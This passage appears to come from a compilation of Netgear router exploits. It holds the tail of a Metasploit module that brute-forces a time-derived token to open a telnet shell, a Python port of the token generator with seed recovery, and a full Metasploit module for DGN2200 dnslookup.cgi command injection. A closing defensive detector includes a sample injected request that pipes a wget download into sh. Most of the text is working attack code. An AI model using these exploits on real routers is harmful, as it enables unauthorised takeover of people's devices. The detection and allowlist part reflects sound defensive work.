          for time in end_time.downto(start_time)
            timestamp = get_timestamp(time)
            sleep 0.1
            if time % 400 == 0
              print_status("#{peer} - Still working, trying time #{time}")
            end
            send_req(timestamp)
            begin
              ctx = { 'Msf' => framework, 'MsfExploit' => self }
              sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => 23, 'Context' => ctx, 'Timeout' => 10 })
              if sock.nil?
                next
              end
              print_status("#{peer} - Success, shell incoming!")
              return handler(sock)
            rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
              sock.close if sock
              next
            end
          end

          end_time = start_time
          start_time -= datastore['TIME_OFFSET']
          if start_time < 0
            if end_time <= datastore['TIME_OFFSET']
              fail_with(Failure::Unknown, "#{peer} - Exploit failed.")
            end
            start_time = 0
          end
          print_status("#{peer} - Going for another round, finishing at #{start_time} and starting at #{end_time}")

          # let the router clear the buffers a bit...
          sleep 30
        end
      end
    end
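The timestamp brute force in results 4 and 6 rests on one fact: the "timestamp" token that gates apply_noauth.cgi is derived from srandom(time) with uClibc's generator, so anyone who can read the router's Date header can regenerate it. The Python below is an added example, not part of either exploit; it ports the generator and get_timestamp from the Ruby above (the state table and magic constants are the exploits' own) and shows the window search recovering the seed second from a token. The seed 1482000000 and the search window are constructed values, and the 32-bit wrap in random() mirrors C's int arithmetic rather than the Ruby port's bignums.

```python
import struct

DEG_3 = 31   # degree of uClibc's TYPE_3 additive feedback generator
SEP_3 = 3    # separation between the two taps

# Initial state table (TYPE_3 word omitted), copied from the exploits above.
RANDTBL_INIT = [
    -1726662223, 379960547, 1735697613, 1040273694, 1313901226, 1627687941,
    -179304937, -2073333483, 1780058412, -1989503057, -615974602, 344556628,
    939512070, -1249116260, 1507946756, -812545463, 154635395, 1388815473,
    -1926676823, 525320961, -1009028674, 968117788, -123449607, 1284210865,
    435012392, -2017506339, -911064859, -370259173, 1132637927, 1398500161,
    -205601318,
]


def to_int32(n):
    """Wrap to a signed 32-bit value, as C's int addition does on the router."""
    n &= 0xFFFFFFFF
    return n - (1 << 32) if n >= (1 << 31) else n


class UclibcRandom:
    """srandom()/random() emulation: the seed fully determines the stream."""

    def __init__(self, seed):
        self.state = list(RANDTBL_INIT)
        if seed == 0:
            seed = 1
        self.state[0] = seed
        word = seed
        for i in range(1, DEG_3):
            hi, lo = divmod(word, 127773)
            word = 16807 * lo - 2836 * hi
            if word < 0:
                word += 2147483647
            self.state[i] = word
        self.fptr = SEP_3
        self.rptr = 0
        for _ in range(DEG_3 * 10):   # discard, exactly as srandom_r does
            self.random()

    def random(self):
        self.state[self.fptr] = to_int32(self.state[self.fptr] + self.state[self.rptr])
        result = (self.state[self.fptr] >> 1) & 0x7FFFFFFF
        self.fptr += 1
        if self.fptr >= DEG_3:
            self.fptr = 0
            self.rptr += 1
        else:
            self.rptr += 1
            if self.rptr >= DEG_3:
                self.rptr = 0
        return result


def float32_round(n):
    """Mirror the firmware's cast through a single-precision float and back."""
    return int(struct.unpack("<f", struct.pack("<f", float(n)))[0])


def get_timestamp(epoch_seconds):
    """Token the firmware derives from a time value (algorithm from the exploits)."""
    t0 = UclibcRandom(epoch_seconds).random()
    hi = (t0 * 0x17DC65DF) >> 32
    t3 = (hi >> 23) - (t0 >> 31)          # magic-number division by 90,000,000
    t0 = t0 - t3 * 0x55D4A80 + 0x989680   # i.e. t0 % 90_000_000 + 10_000_000
    return float32_round(t0)


def recover_seed(token, end_time, window):
    """Walk back from the router's Date header until a second reproduces `token`."""
    for t in range(end_time, max(end_time - window, 0) - 1, -1):
        if get_timestamp(t) == token:
            return t
    return None


if __name__ == "__main__":
    seed = 1482000000                     # constructed: some boot time on 17 Dec 2016
    token = get_timestamp(seed)
    print("token for", seed, "is", token)
    print("recovered seed:", recover_seed(token, seed + 100, 500))
```

Every second of uptime yields one eight-digit token, so the search space is the uncertainty about the boot time, not the token's digit count; that is why the exploits reboot the router first and why TIME_OFFSET matters more than TIME_SURPLUS.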
  7. Netgear DGN2200 dnslookup.cgi Command Injection (Metasploit module)

    ##
    # This module requires Metasploit: http://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##

    require 'net/http'
    require "base64"

    class MetasploitModule < Msf::Exploit::Remote
      Rank = ExcellentRanking

      include Msf::Exploit::Remote::HttpClient

      def initialize(info = {})
        super(update_info(info,
          'Name'           => "Netgear DGN2200 dnslookup.cgi Command Injection",
          'Description'    => %q{
            This module exploits a command injection vulnerablity in NETGEAR DGN2200v1/v2/v3/v4
            routers by sending a specially crafted post request with valid login details.
          },
          'License'        => MSF_LICENSE,
          'Platform'       => 'unix',
          'Author'         =>
            [
              'thecarterb', # Metasploit Module
              'SivertPL'    # Vuln discovery
            ],
          'DefaultTarget'  => 0,
          'Privileged'     => true,
          'Arch'           => [ARCH_CMD],
          'Targets'        => [ [ 'NETGEAR DDGN2200 Router', { } ] ],
          'References'     =>
            [
              [ 'EDB', '41459'],
              [ 'CVE', '2017-6334']
            ],
          'DisclosureDate' => 'Feb 25 2017',
        ))

        register_options(
          [
            Opt::RPORT(80),
            OptString.new('USERNAME', [true, 'Username to authenticate with', '']),
            OptString.new('PASSWORD', [true, 'Password to authenticate with', ''])
          ])

        register_advanced_options(
          [
            OptString.new('HOSTNAME', [true, '"Hostname" to look up (doesn\'t really do anything important)', 'www.google.com'])
          ])
      end

      # Requests the login page which tells us the hardware version
      def check
        res = send_request_cgi({'uri'=>'/'})
        if res.nil?
          fail_with(Failure::Unreachable, 'Connection timed out.')
        end

        # Checks for the `WWW-Authenticate` header in the response
        if res.headers["WWW-Authenticate"]
          data = res.to_s
          marker_one = "Basic realm=\"NETGEAR "
          marker_two = "\""
          model = data[/#{marker_one}(.*?)#{marker_two}/m, 1]
          vprint_status("Router is a NETGEAR router (#{model})")
          model_numbers = ['DGN2200v1', 'DGN2200v2', 'DGN2200v3', 'DGN2200v4']
          if model_numbers.include?(model)
            print_good("Router may be vulnerable (NETGEAR #{model})")
            return CheckCode::Detected
          else
            return CheckCode::Safe
          end
        else
          print_error('Router is not a NETGEAR router')
          return CheckCode::Safe
        end
      end

      def exploit
        check

        # Convert datastores
        user = datastore['USERNAME']
        pass = datastore['PASSWORD']
        hostname = datastore['HOSTNAME']

        vprint_status("Using encoder: #{payload.encoder} ")
        print_status('Sending payload...')
        vprint_status("Attempting to authenticate with: #{user}:#{pass} (b64 encoded for auth)")

        creds_combined = Base64.strict_encode64("#{user}:#{pass}")
        vprint_status("Encoded authentication: #{creds_combined}")

        # host_name is interpolated unescaped into a shell command, so "; <payload>" runs it.
        res = send_request_cgi({
          'uri'       => '/dnslookup.cgi',
          'headers'   => { 'Authorization' => "Basic #{creds_combined}" },
          'vars_post' => {
            'lookup'    => 'Lookup',
            'host_name' => hostname + '; ' + payload.encoded
          }})
      end
    end
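Results 5 and 7 are the same bug in two places: request data (the path after /cgi-bin/ on the R7000/R6400, the host_name field on the DGN2200) reaches a shell unescaped. The Python below is an added example, not code from either module or from Netgear; it shows the allowlist check dnslookup.cgi should have applied to host_name, and the same rules used as a detector over constructed request records modelled on the two exploit requests (the IP addresses and the `id` command in the sample are made up).

```python
import re
from urllib.parse import parse_qs, unquote

# Shell metacharacters that have no business in a hostname or a CGI path.
# '$' also catches the $IFS trick the R7000 vector uses in place of spaces.
SHELL_META = re.compile(r"[;|&`$\n]")

# RFC 1123-style hostname: dot-separated labels of letters, digits and hyphens.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)"
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def valid_hostname(value):
    """Allowlist check: the only safe way to put user input in a lookup command."""
    return HOSTNAME_RE.fullmatch(value) is not None


def findings_for(method, path, body=""):
    """Return the reasons a request looks like Netgear-style CGI command injection."""
    reasons = []
    decoded_path = unquote(path)

    # R7000/R6400: the firmware hands the text after /cgi-bin/ to a shell,
    # so ';' or '$' right inside the path is a red flag.
    if decoded_path.startswith("/cgi-bin/") and SHELL_META.search(decoded_path[len("/cgi-bin/"):]):
        reasons.append("shell metacharacter in /cgi-bin/ path")

    # DGN2200: host_name is interpolated into a command; anything that is not
    # a plain hostname is either malformed or an injection attempt.
    if method == "POST" and decoded_path.startswith("/dnslookup.cgi"):
        params = parse_qs(body, keep_blank_values=True)
        for host in params.get("host_name", []):
            if not valid_hostname(host):
                reasons.append(f"host_name is not a hostname: {host!r}")
    return reasons


# Constructed sample requests (not captured traffic): a benign GET, the R7000
# path injection from result 5, an injected and a clean DGN2200 lookup (result 7).
SAMPLE_REQUESTS = [
    ("GET", "/", ""),
    ("GET", "/cgi-bin/;wget$IFS-O-$IFS'192.0.2.99:8080'|sh", ""),
    ("POST", "/dnslookup.cgi", "lookup=Lookup&host_name=www.google.com%3B+id"),
    ("POST", "/dnslookup.cgi", "lookup=Lookup&host_name=www.example.org"),
]


def scan(requests=SAMPLE_REQUESTS):
    """Map request index -> reasons for every request that trips a rule."""
    hits = {}
    for i, (method, path, body) in enumerate(requests):
        reasons = findings_for(method, path, body)
        if reasons:
            hits[i] = reasons
    return hits


if __name__ == "__main__":
    for i, reasons in scan().items():
        print(i, SAMPLE_REQUESTS[i][1], reasons)
```

On the detection side the rules are deliberately narrow (path prefix plus metacharacter, known CGI plus failed allowlist) so they fire on these two vectors without flagging every URL that happens to contain a `$`; on the fix side, valid_hostname is what the CGI should run before the value ever reaches a command line, and a rejected value should be dropped rather than escaped.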